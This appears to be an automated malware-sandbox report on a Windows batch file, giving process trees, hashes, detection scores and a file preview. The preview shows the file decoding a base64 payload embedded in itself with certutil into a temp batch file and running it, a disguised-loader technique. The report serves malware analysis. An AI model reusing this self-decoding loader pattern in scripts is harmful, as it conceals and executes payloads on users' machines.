Windows
Analysis Report
test.bat
Overview
General Information
Detection
Score: | 1 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  - conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - mode.com (PID: 7308 cmdline: Mode 60,3 MD5: 1A3D2D975EB4A5AF22768F1E23C9A83C)
  - certutil.exe (PID: 7328 cmdline: CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat" MD5: EB199893441CED4BBBCB547FE411CF2D)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth (Nextron Systems) | |
There are no malicious signatures.
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Scripting | Path Interception | 11 Process Injection | 11 Process Injection | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 3% | ReversingLabs | Win32.Trojan.Generic | |
| 7% | Virustotal | | Browse |
Joe Sandbox Version: | 37.1.0 Beryl |
Analysis ID: | 876994 |
Start date and time: | 2023-05-28 09:32:19 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 3m 50s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 4 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample file name: | test.bat |
Detection: | CLEAN |
Classification: | clean1.winBAT@6/2@0/0 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
- Not all processes were analyzed; the report is missing behavior information
Process: | C:\Windows\System32\certutil.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4490960 |
Entropy (8bit): | 5.084469480252474 |
Encrypted: | false |
SSDEEP: | 24576:gUMlU9gRTCyXsYpmM5uXnR4r5ZVeeSZNpE8ybnuSjPJeMMKz1OiPYQ8huXwN9JKG:JKcu6ep4PHAL4jVYC2/ig+ |
MD5: | 25978F2599F1B076B115175A8F557392 |
SHA1: | 3441D1B82C073217A76826C79A75C85355EECE29 |
SHA-256: | 54B229E2CA59E0421FF71D5DF7F344D567A3B77D8472B8F690DDAB0A3839A955 |
SHA-512: | 66B4DE8F20456C43244058AAE45FDB9DE9E80F21C450EE233D5F4F149C9EC8AD8F6BEFE870F12829A936EA80A6660D600BDEA87483DA203E4EB3619DC936075B |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\certutil.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 100 |
Entropy (8bit): | 4.894177320667445 |
Encrypted: | false |
SSDEEP: | 3:qOYFTUxovF6M+YFRRcTwqRF8jxd1ELzdUA2AGN8cv:q3eWnFcCxILxUANGN8e |
MD5: | 9C411874FFF521EF1CEBAA7F35890C52 |
SHA1: | CB963C0D48F92C6C5D601F68D7D56ECC19411239 |
SHA-256: | FF1208CD7D8DC8A23757389FA46955CDA31B024EF5180D4A5EC854BF319DFBEC |
SHA-512: | 4D7727CE7C0F5383F06F96FFD115EA9AF22A53B14B7C6C6FAC448B18DCF12F915A8C99BAC29580B853A97B0A5DDBA767FB3556453EA290715CF0E3E6B2D5F307 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.20450028605933 |
TrID: | |
File name: | test.bat |
File size: | 6175325 |
MD5: | 7e1348c4cc1ddab3b771afb1dd4c9cc2 |
SHA1: | b395aa85edf28a8852ede1d2a59e964584a4fc7f |
SHA256: | 6f308d6ea87ba7a786e0868014d018a928b4cabc4d354d67e8e1d7f3e7eb9cc7 |
SHA512: | 8cd7db51c75e37a3191141632485922d20eecefb16d94aa8629aad3b1951b18e09baa599b5b0c99137262ef34a1fb3414137fcc5ccc5f21e9cf3fa9654a6aa6c |
SSDEEP: | 49152:G4duV2eLoRzGGqGLDw3jF/8ahdU79QVCp4:+ |
TLSH: | DE563C60AF88654DB2881D8BF02E695AB5F32B86C9B3B2CCE343780FB95FD1D3515845 |
File Content Preview: | ..&cls..@echo off ..Title %~n0..Mode 60,3 ..color 0B..echo(..echo Please wait... a while Loading data ......CERTUTIL -f -decode "%~f0" "%Temp%\1.bat" >nul 2>&1 ..cls.."%Temp%\1.bat"..Exit..-----BEGIN CERTIFICATE-----..QGVjaG8gb2ZmDQpTdGFydCAiQ2xpZ |
Icon Hash: | 9686878b929a9886 |
Target ID: | 0 |
Start time: | 09:33:20 |
Start date: | 28/05/2023 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff632260000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 1 |
Start time: | 09:33:20 |
Start date: | 28/05/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c72c0000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 2 |
Start time: | 09:33:21 |
Start date: | 28/05/2023 |
Path: | C:\Windows\System32\mode.com |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ae380000 |
File size: | 31232 bytes |
MD5 hash: | 1A3D2D975EB4A5AF22768F1E23C9A83C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 3 |
Start time: | 09:33:21 |
Start date: | 28/05/2023 |
Path: | C:\Windows\System32\certutil.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6f6a00000 |
File size: | 1557504 bytes |
MD5 hash: | EB199893441CED4BBBCB547FE411CF2D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | moderate |